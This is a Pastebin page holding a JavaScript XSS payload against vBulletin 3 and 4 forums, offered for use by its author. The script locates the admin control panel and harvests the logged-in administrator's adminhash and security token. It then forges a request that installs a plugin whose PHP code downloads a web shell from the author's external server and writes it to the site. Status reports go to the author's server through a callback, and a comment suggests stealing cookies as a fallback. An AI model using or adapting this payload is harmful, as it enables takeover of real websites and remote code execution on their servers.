API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 17th, 2019
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.93 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. # vBulletin 3 and 4 XSS Payload
  3. # This payload will allow you to exploit an XSS vulnerability and create a plugin.
  4. #
  5. # Requirements:
  6. # XSS Vulnerability
  7. # Administrator must be logged into admin panel when you get them to execute the payload
  8. #
  9. # Usage:
  10. # Start the payload with the start_payload function
  11. # There are three parameters: url, search, and acpname
  12. # url is obviously the full path to the forum (with trailing slash!)
  13. # search is whether you want to search for the admincp name (boolean)
  14. # acpname is if you already know the admincp name you can specify it here (just the name no slashes)
  15. # start_payload will return false if no admincp directory is found when search is true
  16. # Once the admincp name is either found or provided by the user the create_plugin function will be called
  17. # You can edit the variables in that function to your liking
  18. # I have a simple callback function here as an example to tell me when a plugin has been created.
  19. #
  20. # Example:
  21. # <script src='http://linktoexternalhost.com/payload.js'></script><script>start_payload("http://localhost/forum/", true, null);</script>
  22. #
  23. # @PlumLulz
  24. # plumm@jabber.org
  25. # 2013
  26. #
  27. # Silent but deadly
  28. */
  29.  
  30.  
  31. // Lets create the jQuery source
  32. var jq = document.createElement('script');
  33. jq.src = "//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js";
  34. document.getElementsByTagName('head')[0].appendChild(jq);
  35.  
  36. // Callback function
  37. // All this does is send a message to my server when something happens. Where it saves it to a log file for later viewing.
  38. function callback(message) {
  39. var url = 'http://plums-z0ne.net/cb.php?cb='+message;
  40. $.get(url, function (response) {
  41. // Callback response
  42. });
  43. }
  44.  
  45. // Start payload function
  46. function start_payload(url, search, acpname) {
  47. if(search == true) {
  48. // Lets try and get the admincp directory
  49. $.get(url+"index.php", function(response) {
  50. // Check the footer links to see if admin exists
  51. // If it does steal the value
  52. // The footer class is different in vB3 so we must check for both
  53. if($(response).find('.footer_links').length) {
  54. // vB4 footer found
  55. // Look at each footer link for Admin
  56. $('.footer_links li', response).each(function() {
  57. // Admincp link found
  58. if($($(this).html()).html() == 'Admin') {
  59. var admincpdir = $($(this).html()).attr('href').replace('index.php' , '');
  60. create_plugin(url, admincpdir);
  61. return true;
  62. }
  63. });
  64. } else if($(response).find('.tfoot')) {
  65. // vB3 footer found
  66. // Look at each footer link for Admin
  67. $('.tfoot a', response).each(function() {
  68. if($(this).html() == 'Admin') {
  69. var admincpdir = $(this).attr('href').replace('index.php', '');
  70. create_plugin(url, admincpdir);
  71. alert(admincpdir);
  72. return true;
  73. }
  74. });
  75. }
  76. if(!admincpdir) {
  77. return false;
  78. }
  79. });
  80. } else {
  81. var admincpdir = acpname+"/";
  82. create_plugin(url, admincpdir);
  83. return true;
  84. }
  85. }
  86.  
  87. // Create plugin function
  88. function create_plugin(url, admincpdir) {
  89. // Plugin information
  90. var product = 'vbulletin';
  91. var hookname = 'ajax_start';
  92. var title = 'Pwned By XSS';
  93. var executionorder = '5';
  94. var phpcode = "if(isset($_GET['pwned'])) {if(file_put_contents('pwned.php', file_get_contents('http://plums-z0ne.net/shell2.txt'))) { echo 'pwned'; } }";
  95. var active = '1'; // boolean
  96.  
  97. // Lets fetch the adminhash and securitytoken for the POST request
  98. $.get(url+admincpdir+"plugin.php?do=add", function(response) {
  99. var adminhash = $(response).find('input[name="adminhash"]').val();
  100. var securitytoken = $(response).find('input[name="securitytoken"]').val();
  101.  
  102. // Lets make the POST request and create the plugin
  103. $.ajax({
  104. type: "POST",
  105. url: url+admincpdir+"plugin.php?do=update",
  106. dataType: 'text',
  107. data: {
  108. do:"update",
  109. adminhash:adminhash,
  110. securitytoken:securitytoken,
  111. product:product,
  112. hookname:hookname,
  113. title:title,
  114. executionorder:executionorder,
  115. phpcode:phpcode,
  116. active:active,
  117. pluginid:""
  118. },
  119. error: function (request, textStatus, errorThrown) {
  120. // We must catch the response error for vB4 versions
  121. if(request.responseText.search('Saved Plugin Successfully') != -1) {
  122. // Plugin created
  123. // Put a callback here so you know when your plugin has been created
  124. // I like to send a text or email to myself
  125. callback("Plugin created on "+url+" hookname: "+hookname+" phpcode "+phpcode);
  126. }
  127. }
  128. }).done(function(result) {
  129. if(result.search('Saved Plugin Successfully') != -1) {
  130. // Plugin created
  131. // Put a callback here so you know when your plugin has been created
  132. // I like to send a text or email to myself
  133. callback("Plugin created on "+url+" hookname: "+hookname+" phpcode "+phpcode);
  134. } else {
  135. // User is not logged in
  136. // You can steal their cookies or try something else at this point
  137. callback("Failed to create plugin on "+url);
  138. }
  139. });
  140. });
  141. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!